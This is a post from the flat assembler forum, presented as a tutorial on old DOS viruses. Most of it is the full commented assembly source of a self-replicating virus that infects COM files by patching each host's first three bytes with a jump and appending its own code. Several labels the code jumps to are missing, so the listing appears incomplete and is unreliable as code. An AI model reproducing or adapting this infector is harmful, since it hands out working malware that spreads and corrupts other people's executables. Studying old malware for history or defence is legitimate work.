flat assembler
Message board for the users of flat assembler.

Index > DOS > TUTORIAL/INFO: DOS viruses

Thread Post new topic Reply to topic

Joined: 06 Jan 2011
Posts: 200
Hello everybody, today I want to bring up DOS viruses. As most of us remember, viruses back in the DOS days were mostly nasty little programs made by mostly malevolent programmers. Due to the trivial nature of viruses, the knowledge of how they worked(and work still today) has been mostly lost. That's why I wrote a small DOS virus(148 bytes) to demonstrate how the little programs worked. P.S. I learned almost all the assembly I know today from programming these viruses.
Runtime COM infecting virus using FASM:
org 100h ;we're a COM file
db 0e9h, 0, 0 ; stub program for virus
        call    begin ; gets BP
        pop     bp ; pop BP
        sub     bp, begin ; adjusts bp to current offset
        mov     ah, 1ah ; new DTA function 
        lea     dx, [bp+new_dta] ; let's make a new DTA at the end of the file
        int     21h ; DOS interrupt
        mov     di, 100h ; begining offset of COM file
        lea     si, [bp+bytes] ; stored bytes from overwritten code
        push    di ; save 100h for later
        movsw ; move 2 bytes
        movsb ; move 1 byte totaling 3 bytes restored (jmp = 3 bytes)
        mov     ah, 4eh ; find first file function
        xor     cx, cx ; no special file type
        lea     dx, [bp+comfile]; offset of comfile data
        int     21h
        jc      exit ; if no file is found, exit
        mov     ax, 3d02h ;open for read/write
        lea     dx, [bp+new_dta+1eh] ;location of file in DTA (1eh)
        int     21h
        xchg    ax, bx ;save file handle in BX
        mov     ah, 3fh ; DOS read function
        lea     dx, [bp+bytes] ; overwrite stored bytes in RAM
        mov     cx, 3 ; read 3 bytes
        int     21h
        mov     ax, word[bp+new_dta+1ah] ;get file size from DTA (1ah)
        mov     cx, word[bp+bytes+1] ;mov CX offset from the jmp command eg. JMP XXXX:XXXX
        add     cx, vend-start+3 ; add 3 bytes to virus size 
        cmp     ax, cx ; compare the two
        jz      close ; if equal, then infected close it
      sub     ax, 3 ; subtract 3 from file size for jmp
        mov     word[bp+newjump+1], ax ; move AX (jmp location) to newjump
        mov     ax, 4200h ; seek to beggining file
        xor     cx, cx ; zero CX
        cwd                ; Convert Word to Double word(converts word in AX to double word held in AX:DX, therefore both are zeroed)
        int     21h 
        mov     ah, 40h ; write function
        lea     dx, [bp+newjump] ;location of new jump
        mov     cx, 3 ;write 3 bytes
        int     21h
        mov     ax, 4202h ;seek to end (al = 01, 02, 03 means from begining, current pointer, or end respectively)
        xor     cx, cx ; same tricks
        int     21h
        mov     ah, 40h
        mov     cx, vend-start ;find virus size by subtracting the EOF from BOF
        lea     dx, [bp+start] ; write from the begining
        int     21h
        mov     ah, 3eh ;close file handle
        int     21h
        mov     ah, 4fh ;find next file using the same '*.com'
        jmp     next
        mov     ah, 1ah ;restore DTA to it's original place 80h in the PSP
        mov     dx, 80h
        int     21h 
        ret   ; return to 100h. Remember that 'PUSH DI' earlier
comfile db      "*.com", 0 ; comfile wildcard, NULL terminated
bytes   db      0cdh, 20h, 0 ; restore bytes(translates into 'INT 20h' for the initial host, but is overwritten later on)
newjump db      0e9h, 0, 0 ; new jump waiting for parameters
vend: ;end of code
new_dta db 42 dup (?) ;new DTA. The DTA is 42 bytes in total, but since it is just zeros, it can just take up the slack space after a file    
Post 14 Jan 2011, 21:58
View user's profile Send private message Reply with quote
Display posts from previous:
Post new topic Reply to topic

Jump to:  

< Last Thread | Next Thread >
Forum Rules:
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum

Copyright © 1999-2020, Tomasz Grysztar.

Powered by rwasa.